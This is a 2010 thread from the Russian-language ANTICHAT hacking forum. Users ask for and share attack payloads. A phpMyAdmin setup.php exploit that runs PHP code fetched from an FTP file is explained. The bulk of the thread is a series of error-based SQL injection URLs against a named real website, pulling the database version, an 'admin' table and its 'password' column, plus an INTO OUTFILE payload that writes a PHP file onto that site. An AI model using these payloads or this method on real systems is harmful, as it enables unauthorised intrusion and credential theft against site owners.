ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
26.06.2010, 22:20
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544
Репутация:
412
|
|
Сообщение от CyberHunter
CyberHunter said:
С каким содержимым файл? В скрипте
этом?
И вообще можете объяснить, что сделает
этот
скрипт? Это сплоит на исполнение php кода
#
$pma_setup_url = 'http://site.com/phpMyAdmin/scripts/setup.php'; /*полный адрес скрипта установки phpMyAdmin*/
#
$ftp_code = 'ftp://userassword@ftp.com/www/test.txt'; /*полный ftp-путь до файла с содержимым */
В $pma_setup_url путь pma....
В $ftp_code путь к текстовому файлу на фтпшке, в этом файле будет пхп код который ты хочеш испольнить,например тот же phpinfo();
Что может быть проше?
|
|
|
26.06.2010, 22:25
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008
Репутация:
58
|
|
Сообщение от None
Если ты следишь за лентами эксплойтов, то, наверняка, не должен был пропустить уязвимость популярнейшего менеджера баз данных MySql phpMyAdmin версий до 2.11.9 (http://www.gnucitizen.org/static/blog/2009/06/phpmyadminrcesh.txt).
Уязвимость заключалась в том, что скрипт установки ./scripts/setup.php вообще не проверял пользовательские данные, которые затем записывались в конфигурационный файл.
Эксплойт был всем хорош, кроме того, что администратор уязвимого хоста должен был вручную создать директорию ./config и дать ей права на запись (именно туда должен был записываться ядовитый конфиг), что на практике встречалось крайне редко. Настало время исправить это недоразумение.
script srazu vypolnyaet $ftp_code
|
|
|
|
26.06.2010, 22:28
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074
Репутация:
257
|
|
Сообщение от 547
547 said:
вроде блайнд,версия 5 хелп!!!
Код:
Code:
http://www.plan-art.co.uk/case.php?id=116+and+substring(@@version,1,1)=5--
Вы просто пипец..
Если вы не можете прочитать пару статей на эту тему, то хоть "сконструируйте" логический вопрос.
Сообщение от pinch
pinch said:
http://www.plan-art.co.uk/case.php?id=116+and+(select+1+from+(select+count(0 ),concat((select+version()),floor(rand(0)*2))+from +information_schema.tables+group+by+2)a)--
Сообщение от 547
547 said:
неплохо, но хотелосьбы получить еще базы,таблички,колонки...и потом выдрать инфу из таблички...
желательно в подробностях...
Сообщение от CyberHunter
CyberHunter said:
table_name:
Код:
Code:
http://www.plan-art.co.uk/case.php?id=116+and+(select+1+from+(select+count(0),concat((select+table_name),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)+--+
admin
column_name:
Код:
Code:
http://www.plan-art.co.uk/case.php?id=116+and+(select+1+from+(select+count(0),concat((select+column_name),floor(rand(0)*2))+from+information_schema.columns+where+table_name='admin'+group+by+2)a)+--+
password
Вместо version() пиши то, что тебе нужно. Может я старомоден, но люблю начинать с конца.
http://www.plan-art.co.uk/brochures.php?catid=-5+union+select+'',null+from+mysql.user+into+outfil e+'C:/plan/def/hello.php'
Урл без ввв > http://plan-art.co.uk/hello.php - палюсь
|
|
|
|
26.06.2010, 22:34
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
Сообщение от v1d0qz
v1d0qz said:
Вы просто пипец..
Если вы не можете прочитать пару статей на эту тему, то хоть "сконструируйте" логический вопрос.
та я уже и сам допер на самом деле но всеравно спс...
просто непойму пока как вывести список всех таблиц а не одну? так само колонки...
|
|
|
|
26.06.2010, 22:37
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от 547
547 said:
та я уже и сам допер на самом деле но всеравно спс...
просто непойму пока как вывести список всех таблиц а не одну? так само колонки...
насколько знаю не можешь
|
|
|
|
26.06.2010, 23:11
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
я думаю что можно
|
|
|
|
26.06.2010, 23:15
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от 547
547 said:
я думаю что можно
ну так колдуй и покажи нам запрос, мне тоже интересно
|
|
|
|
26.06.2010, 23:23
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
Сообщение от Konqi
Konqi said:
ну так колдуй и покажи нам запрос, мне тоже интересно
пока ниче неполучается
|
|
|
|
26.06.2010, 23:30
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
Груп_конкат там не катит, а значит нельзя.
|
|
|
|
26.06.2010, 23:33
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
а я о чем
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
